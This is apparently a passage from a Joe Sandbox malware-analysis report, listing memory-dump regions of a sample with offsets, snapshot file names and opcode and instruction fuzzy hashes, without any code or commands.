                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +
                                                                    • API String ID: 0-2626494186
                                                                    • Opcode ID: 93a0d005b6bde163618cb44c309ad8257d0f0808c84440d94ea3a61ec3e1cf4c
                                                                    • Instruction ID: ec169da1cf268fc2bb8a530dfb65731e65d0399a0163320795ebf12d02db4f67
                                                                    • Opcode Fuzzy Hash: 93a0d005b6bde163618cb44c309ad8257d0f0808c84440d94ea3a61ec3e1cf4c
                                                                    • Instruction Fuzzy Hash: DF31C272A10205ABD7049F29CC45BABFBB6FF8835CF018529F908CB240EB30E901C798
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 71b6e956a899a38877e2d798a214db70c7806156f3e223959cc696ad189e7dc1
                                                                    • Instruction ID: 943c676b49852893cb589c2e878fa9a647af0ef4e591ff61a9bcdd7bca3a0d3b
                                                                    • Opcode Fuzzy Hash: 71b6e956a899a38877e2d798a214db70c7806156f3e223959cc696ad189e7dc1
                                                                    • Instruction Fuzzy Hash: FC416875A10209EFCF11CF95C8909EEBBB6FB88324F1140A9F915AB254DB32C961DB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 8c824d72d0ec71ccb5a1e11ba895f945cfda61e13e6d08c21d46c9f2c9bee0f5
                                                                    • Instruction ID: b7318fa02bde23f8712ccc48240fa469f4aa7a68e1b92cec7e7b659409712fd5
                                                                    • Opcode Fuzzy Hash: 8c824d72d0ec71ccb5a1e11ba895f945cfda61e13e6d08c21d46c9f2c9bee0f5
                                                                    • Instruction Fuzzy Hash: 4C31AA30E02219EFDB21EFD1EC09FEEBBB8EF04715F450429E506AA180D3B09A14DB60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (
                                                                    • API String ID: 0-3887548279
                                                                    • Opcode ID: 1346443da7a702d0304e8d089ffde6b7fcbe94b57d059522d1780ef9d23d34fe
                                                                    • Instruction ID: 08e3a62c411cab4981bdf245b29d1628992753d0a8b9b235ad6468502146236a
                                                                    • Opcode Fuzzy Hash: 1346443da7a702d0304e8d089ffde6b7fcbe94b57d059522d1780ef9d23d34fe
                                                                    • Instruction Fuzzy Hash: 3541BEB1D10209DFDB21CFDAD984BDDBBB4BF48398F10842AE419AB254D778A945CF60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: B
                                                                    • API String ID: 0-1255198513
                                                                    • Opcode ID: ef7db76e275569ca2c617c76cd121abd3c97e14568a6b4025339806b24f9fd29
                                                                    • Instruction ID: 9df5762640f079c8463669a3e61d60b5c3cd5191e4603c822ceb14333166277c
                                                                    • Opcode Fuzzy Hash: ef7db76e275569ca2c617c76cd121abd3c97e14568a6b4025339806b24f9fd29
                                                                    • Instruction Fuzzy Hash: 95314DB1D1010AEFDF10DFD4D888AEEBBBCFB44325F144629E516A7291D7B49941CB60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \
                                                                    • API String ID: 0-2967466578
                                                                    • Opcode ID: 08b48e2304db2c29beb13865e33708b40f741c808c189744ee411b08d5984f29
                                                                    • Instruction ID: 39676460df696dd3ee9a2540b700a4cc8e26538073f5ceafd84a6618f5a69510
                                                                    • Opcode Fuzzy Hash: 08b48e2304db2c29beb13865e33708b40f741c808c189744ee411b08d5984f29
                                                                    • Instruction Fuzzy Hash: D0112175A40200AFD724EFA9DC49FBB7BF8EF84710B014169F846CB210EBB0A900C6A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: af70ede29b47a962508c82d0fdaa129eeb3ecf5c7d56bdd112631655b6f1aba6
                                                                    • Instruction ID: fab2bdb25b7395513cf0fd74d6e317c3d919954fedd286fe7fee129ee24bab67
                                                                    • Opcode Fuzzy Hash: af70ede29b47a962508c82d0fdaa129eeb3ecf5c7d56bdd112631655b6f1aba6
                                                                    • Instruction Fuzzy Hash: 28216271D50219ABCB21EFE9D848BDEBBF4EB49724F014166E914FB340D7749940CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: dd3c6ab2646ebde59fd5e43f7f46fa38c34078ac6c6fbe738d261290ce4ee704
                                                                    • Instruction ID: a1c9e835a56f5c98763e6095a5349095f4774e6133533db3bef72241b57d5d1f
                                                                    • Opcode Fuzzy Hash: dd3c6ab2646ebde59fd5e43f7f46fa38c34078ac6c6fbe738d261290ce4ee704
                                                                    • Instruction Fuzzy Hash: C1015E7143120AEBCF16EFD0D908AAD3B66FB0874CF088419B915940A8D779C560EF25
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a7a8bb9cad491bb67a7e03ebd0f31db7819906521329c16196dba19e13570d89
                                                                    • Instruction ID: 1d1f227726a4db5317c732f6a68f8813282b1e726cea3af2e6d2a9b3cacaf5c7
                                                                    • Opcode Fuzzy Hash: a7a8bb9cad491bb67a7e03ebd0f31db7819906521329c16196dba19e13570d89
                                                                    • Instruction Fuzzy Hash: 24826D74A10206DFCB29CF99C490AFAB7F2FF88344F258569D5469B344E735EA42CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f4fdb0fb3a63ffcc2ef45ecfba15a9bef4346b5fb37c5d39ade5261d20029b0a
                                                                    • Instruction ID: 133bfa5934c4289a2a63b7ba1865dac7fd80ed7ddb6978a73d36c20d7f50ed6b
                                                                    • Opcode Fuzzy Hash: f4fdb0fb3a63ffcc2ef45ecfba15a9bef4346b5fb37c5d39ade5261d20029b0a
                                                                    • Instruction Fuzzy Hash: 1D62D03A80464AEBCF65CF0CD4901EEBBB2BB55308B65D65EC89E67705D331BA44CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c0b0d770c809bc84ddbdb17335f14771ded34d07804c98a96ae831905220e00a
                                                                    • Instruction ID: 7a93ba45eaa03d872d24af8d96d0266bd9c25003e85aec3fa1c654262373120b
                                                                    • Opcode Fuzzy Hash: c0b0d770c809bc84ddbdb17335f14771ded34d07804c98a96ae831905220e00a
                                                                    • Instruction Fuzzy Hash: E3627E71D00249DFEF14DFA9C880BAEB7B6FF44305F2481AAD916AB385D7349A85CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f933a730031b89d025ea583653a8a3e0c86aae27f30676c2f9e3e185c12f5a78
                                                                    • Instruction ID: 539cc4775bba0c10847f3ab4e8d3b1e5a4cdf9a41124a5e59d8a80de2a7778a9
                                                                    • Opcode Fuzzy Hash: f933a730031b89d025ea583653a8a3e0c86aae27f30676c2f9e3e185c12f5a78
                                                                    • Instruction Fuzzy Hash: 98321AB7F507299BCB14CED5DCC05CDB3B2BF98214B1E9165C914F7306E6B8AA068B90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 32b28cab6d2e28bb15fe77970879c0a2b44d8f74aaca23c41b881ed65234de92
                                                                    • Instruction ID: 9efb8039796fbc228e2ed32aa0cc683446225ab52002b3eb3dc3cf4f5c7eccdb
                                                                    • Opcode Fuzzy Hash: 32b28cab6d2e28bb15fe77970879c0a2b44d8f74aaca23c41b881ed65234de92
                                                                    • Instruction Fuzzy Hash: B5427B75E00219AFEB24CF69C891BADBBF6BF48304F1481DAE849EB241D7349985CF54
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2034ef2d1093fe14b1051670e607651c26a2f325e81ac25a7369f8554441ad20
                                                                    • Instruction ID: cdb71243bbe0964f3ed31f14f344bd409f1c991c806e6eb8931d5f5be74907ac
                                                                    • Opcode Fuzzy Hash: 2034ef2d1093fe14b1051670e607651c26a2f325e81ac25a7369f8554441ad20
                                                                    • Instruction Fuzzy Hash: A712BE701283428FDB24DFB6C46077BBBEAAFC0304F58882DA49586A99DB75D54DCF12
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fbd85d132cf7e5b4f747680f54e2a5b0fa49f5064d6ceeec28576a220da60581
                                                                    • Instruction ID: 2ba549c4b64fa8e8b5af553416af80589da41af9d60ad972d528749d21968353
                                                                    • Opcode Fuzzy Hash: fbd85d132cf7e5b4f747680f54e2a5b0fa49f5064d6ceeec28576a220da60581
                                                                    • Instruction Fuzzy Hash: 49F14072B002189FDB0CCEADDD956EDBBF6AFCC310B198069E509EB350D6789D418B64
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e7346991463beed57dd506ce8fd579a0fece507a01ce14fd0497e77c6ff69bee
                                                                    • Instruction ID: 81872c2c0e71070e234b8c222c05be11ad02ad6801f7bec06a60230d7c8e7a45
                                                                    • Opcode Fuzzy Hash: e7346991463beed57dd506ce8fd579a0fece507a01ce14fd0497e77c6ff69bee
                                                                    • Instruction Fuzzy Hash: E602A071E04209DFCB0ACF98D4906EDFBB2FF88314F25A56AD855AB751D330A942CB58
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2ab7f21fae64cf37450170427c63f435216d67a8087525eb567035f1d5e84915
                                                                    • Instruction ID: d04b59e4a69377cd59ed6d761c9e0b25b71696c8be7d004327e8137b5823b0f0
                                                                    • Opcode Fuzzy Hash: 2ab7f21fae64cf37450170427c63f435216d67a8087525eb567035f1d5e84915
                                                                    • Instruction Fuzzy Hash: 3CF1C472E006618BCF18CF69C9A067DFFFABF88210759816ED856DB280D734E941CB54
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bfc4fc7f6fa562d51d7397f6da39aa993918569d16132f942407df22924e9747
                                                                    • Instruction ID: 1e0c29d89a13a1637b7a6576a56d05f74de1f6ab2e210bb262dc32038b54cc0e
                                                                    • Opcode Fuzzy Hash: bfc4fc7f6fa562d51d7397f6da39aa993918569d16132f942407df22924e9747
                                                                    • Instruction Fuzzy Hash: AEF1E2716006619FCB25CF64C440BBEBBF5FF0A309F06855AD4969B2C2CB34E949CB94
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e5582643463c3967b2773e6c5f387ef749f62df33704d32182782a23c4c81087
                                                                    • Instruction ID: 7c24bb5ddbf1692cbb5616fb85aa98a866344c3800ba392ebb3bf65810e0c43e
                                                                    • Opcode Fuzzy Hash: e5582643463c3967b2773e6c5f387ef749f62df33704d32182782a23c4c81087
                                                                    • Instruction Fuzzy Hash: C6F15033D10665ABD750CFADDC8014EB7A2AF89212B5EC6A9CA4477316C630BE12CBD4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 831d6f376464b1d2a92c78571dbc7e5d60e3383a231ce02d734ff6c7a2904d31
                                                                    • Instruction ID: ba20c350b017c18b87ad8206db5bbd762c3971a022e62f4534d3a7bc3e2a53a5
                                                                    • Opcode Fuzzy Hash: 831d6f376464b1d2a92c78571dbc7e5d60e3383a231ce02d734ff6c7a2904d31
                                                                    • Instruction Fuzzy Hash: CBE147B1D2165A8BCB24CF98D4846ADBBF5FF48700F258A9EE804AB308D7759941CF94
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fdf50b1f8f7d343a35776016adbd23b94bd8b273d45bfc8ef786aac891a4a2a1
                                                                    • Instruction ID: ee7916a3b8497f9202dfac231c138d6a22f45f8d5ea5b932621116dd57bfd061
                                                                    • Opcode Fuzzy Hash: fdf50b1f8f7d343a35776016adbd23b94bd8b273d45bfc8ef786aac891a4a2a1
                                                                    • Instruction Fuzzy Hash: D8A12470A106469FDB28EF64C4C0BBEB7B2BF44704F04856FD4969B781D774A882CBA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                    • Instruction ID: 5c5783691c09725b3ec144e7187510356bdea9512895036c3b041aed01cbb67d
                                                                    • Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                    • Instruction Fuzzy Hash: F8915076610A029FD765CF2DC885A76BBE0FF49328B248A1ED4E6CB6E4C375E551CB00
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dfd7ff1d3ee8164197bbee32d5490c6ed526ad9bdfe57c0d74bef020dc89d0a4
                                                                    • Instruction ID: 67f8f49fd5395f742d8fd26e49aaecefc266fcb7f9cac738b8195449de9c9ad5
                                                                    • Opcode Fuzzy Hash: dfd7ff1d3ee8164197bbee32d5490c6ed526ad9bdfe57c0d74bef020dc89d0a4
                                                                    • Instruction Fuzzy Hash: 0571F475A60306ABEB10ABD4CE44FBA77B9DF84304F504155F806EF6D8E7709A01CB9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f902f0e785d3eaaf1c962573e2ea80b7db32e2bd6eb6eb8b65b8858e249472d3
                                                                    • Instruction ID: 556bdd90154f1f0544302c304e2213eba90fca0b0e66c7e66006f2d1c480c8be
                                                                    • Opcode Fuzzy Hash: f902f0e785d3eaaf1c962573e2ea80b7db32e2bd6eb6eb8b65b8858e249472d3
                                                                    • Instruction Fuzzy Hash: ED819871E00115ABCB14CFA9C8805BDFBF1FF88328B2547AAD861E7390DB749955CB94
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1556318f26f68cf7c1a5ce43ef4d1d15648cd7e9da62f84d4659a5a5711379c8
                                                                    • Instruction ID: 69b504fd34853074ef1ead29da16c5f200cdaa7a4ef6c567e103efcef285bcaa
                                                                    • Opcode Fuzzy Hash: 1556318f26f68cf7c1a5ce43ef4d1d15648cd7e9da62f84d4659a5a5711379c8
                                                                    • Instruction Fuzzy Hash: A681AE71A101259FDF18DE69C8809BFBBB2FF85654B248297E8159B349D730E981CBA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3555d5bb5d2b531b53a2d60680bd33d3e9d2936f2abd4e0a918b5ba453720e72
                                                                    • Instruction ID: 34a876cec1cc6d8088c92126a30abf184f162b68424ebd3cd7c30893bfc36eae
                                                                    • Opcode Fuzzy Hash: 3555d5bb5d2b531b53a2d60680bd33d3e9d2936f2abd4e0a918b5ba453720e72
                                                                    • Instruction Fuzzy Hash: D8817175E502198BDB55CFA8C8907ACF7B2FF8531CF249719D021AB2D4EB359906CB48
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 631cc9db28fbb5e45e95279d54be590a64f2f9ddedc46c52593408bf5c0d74de
                                                                    • Instruction ID: c4675f1be1c04fccf47af0899798649a905e3f6e44e047c82617decbce17ebfa
                                                                    • Opcode Fuzzy Hash: 631cc9db28fbb5e45e95279d54be590a64f2f9ddedc46c52593408bf5c0d74de
                                                                    • Instruction Fuzzy Hash: CA71AB31B90611EFDB21AFE4DD48B6A77A8AF04B50F110528F906DB2A8DBF0DE00DB55
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 28697a3997c16dbcab0b92fd78eeeeee245d5a86a10dd79b5b46d27b3eb2d52b
                                                                    • Instruction ID: da05c75b5d4413c8c82bcd532b8ade590b3164cd89f1464f1b4bad5b117c0908
                                                                    • Opcode Fuzzy Hash: 28697a3997c16dbcab0b92fd78eeeeee245d5a86a10dd79b5b46d27b3eb2d52b
                                                                    • Instruction Fuzzy Hash: 71818075A006059FCB18CF99C480BAEFBF6BF85318F18856DD8169B345DB74E901CB54
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: be299507293bef6e4c99d5546dafa6846f93f0d560be9e31130c88362f4f89e3
                                                                    • Instruction ID: fcfe2e0e382863a83c185929bc4f68f58f24fa00dcdc9805e207d767e05859ac
                                                                    • Opcode Fuzzy Hash: be299507293bef6e4c99d5546dafa6846f93f0d560be9e31130c88362f4f89e3
                                                                    • Instruction Fuzzy Hash: 8291AE75A107458FDB28CFA9C889BA6B7F5FF48308F24469DE44A9B665DB70E940CF00
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520956038.000000000227C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0227C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_227c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 89440434ded5af6726928822bea8c0fba30e461aeec4d6f5364ae2d644ef327a
                                                                    • Instruction ID: aa0d5910f0c5afd3fd95a61736175333fcc5c29787fcf773c93d373a756d1c23
                                                                    • Opcode Fuzzy Hash: 89440434ded5af6726928822bea8c0fba30e461aeec4d6f5364ae2d644ef327a
                                                                    • Instruction Fuzzy Hash: DF61F571626302DBDB24CFA4C8A4BABB3E5EF88754F00092DF959D7A54DB70D900CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
